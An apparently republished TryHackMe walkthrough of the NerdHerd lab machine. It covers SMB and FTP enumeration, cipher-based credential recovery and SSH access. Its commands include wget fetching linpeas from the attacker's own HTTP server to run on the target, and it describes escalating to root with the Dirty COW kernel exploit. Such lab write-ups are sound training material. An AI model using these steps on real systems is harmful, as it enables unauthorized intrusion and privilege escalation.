Hacking, Kernel Exploits, SMB
TryHackMe — NerdHerd Walkthrough
A walkthrough with my tactics, techniques, and procedures.
Reconnaissance/Scanning:
I started off by scanning the network to see which ports were open/services running on the ports.
$ nmap -A -O -sC -sV -p- <machine_IP>
Gobuster scan on port 1337:
Scanning /admin:
Trying to enumerate the SMB server for anything, using smbmap I found the shares but no users. Since I have no access as guest, I need a username.
$ smbmap -H <machine_IP>
Looking for users using the tool enum4linux, I found one!
$ enum4linux -a <machine_IP>
Nice! I tried logging in to the SMB server to view the share nerdherd_classified as the user chuck but was prompted for a password, which I don’t happen to have..
I’ll start working on the FTP server since it supports anonymous login.
In the /pub directory there’s a hidden directory and a png file.
In the /.jokesonyou directory there was a text file.
Contents of that text file:
Well, using “leet speak”, they must mean 1337 from leet, so what I’m looking for must be on the web server.
Lol, I got an alert as soon as I got to the Apache splash page.
Followed by:
Well, let me check the source code before I head to the /admin directory.
Towards the bottom was a link to “The Bird is the Word” music video on youtube.
Moving on to the /admin page, I was brought to a login prompt. Before I tried some SQL injection, I checked the source code to find something noteworthy.
Looks like some base64 encoded strings.
I got another username from the first string!
When trying to decode the second string I got a message saying it was invalid, so I tried to remedy it myself without luck. I was able to find a base64 repair tool but that didn’t work either!
Since I couldn’t get that second string decoded, I moved on to the image file.
I tried to run some steganography tools on it but the alert I kept getting was “file not supported”.
I ran the command exiftool to look at the metadata on it for anything and when I saw the owner name it stood out. It didn’t look normal to me, so I googled it in case it was a clue.
The first result that popped up was Vigenère cipher. I went to dcode[.]fr and tried to decode it, but no luck.
There was a field for a key on the decode page, which made me think back to the findings from earlier. Bird is the word. I’ll try the word “bird”.
That only looks halfway decoded but looks like there is a key! That made me think of trying the whole name of the song.
Looks like it turned out to be a password! Since I have a password now, let me go back to the SMB server and try that again.
$ smbclient \\\\10.10.220.169\\nerdherd_classified -U chuck
With the password found I can now log in!
After downloading that, this is what the contents were:
Visiting that directory showed another text file.
The contents of the text file really were credentials, well, potentially. Let me try them on the SSH server.
Initial foothold:
I’m in!
This user is in plenty of groups, maybe one of them has access to files or executables I can exploit..
First things first, check the easy things since I have this user’s password.
I’ll grab the user flag while i’m at it.
Exploit:
Can’t run anything as root, nothing juicy in the .bash_history file, no cronjobs, and no binaries with SUID bits.
I changed directories to /tmp, uploaded linpeas and fired that off.
# I started a python server on my machine
$ python3 -m http.server <PORT>
# then I used wget to grab the script to the target machine
$ wget hxxp://<IP>:<PORT>/path/to/file
# after successfully getting the script change permissions to execute
$ chmod 777 linpeas.sh
# execute the script
$ ./linpeas.sh
One of the things the script found was:
It’s showing that the machine is potentially vulnerable to CVE-2016–5195 which is the “dirty cow” kernel exploit. Info found here.
“A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.
An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.”
Here’s a snippet via exploit-db[.]com from the code on how to be able to run it.
I had to download the script to my machine, use Python to make another simple server, then grab it on the target machine and follow the directions to execute it.
Privilege Escalation:
The new user with root privileges is made via the script and now I can escalate to that user.
Now with root privileges, I was going to get the root flag, or so I thought.
I used the find command with some tweaking to see all the text files
# find / -type f -iname '*.txt' 2>/dev/null | grep "root"
Now i’ll grab the root flag!
I stumbled onto the bonus flag by being nosy and looking at root’s .bash_history file since its output didn’t get deleted. LOL
Reporting:
- It’s highly advised to disable anonymous login on the FTP server.
- Enable account lockout on the SSH server to prevent bruteforce attacks.
- Be sure to use strong passwords on files or even a password manager to help generate and store the password.
- Keep all software and hardware patched and up to date with the latest security releases to prevent vulnerabilities.
- Have the file output of user’s .bash_history get deleted.
Note from Publication: This story was uploaded at the permission of user “xocybersec” on 2/1/24. Please direct any feedback, comments, or citations to the original writer! Thank you — Infosec WatchTower
© [2024] Infosec WatchTower. All rights reserved. Unauthorized use or reproduction of content is prohibited. For inquiries, contact Infosec WatchTower.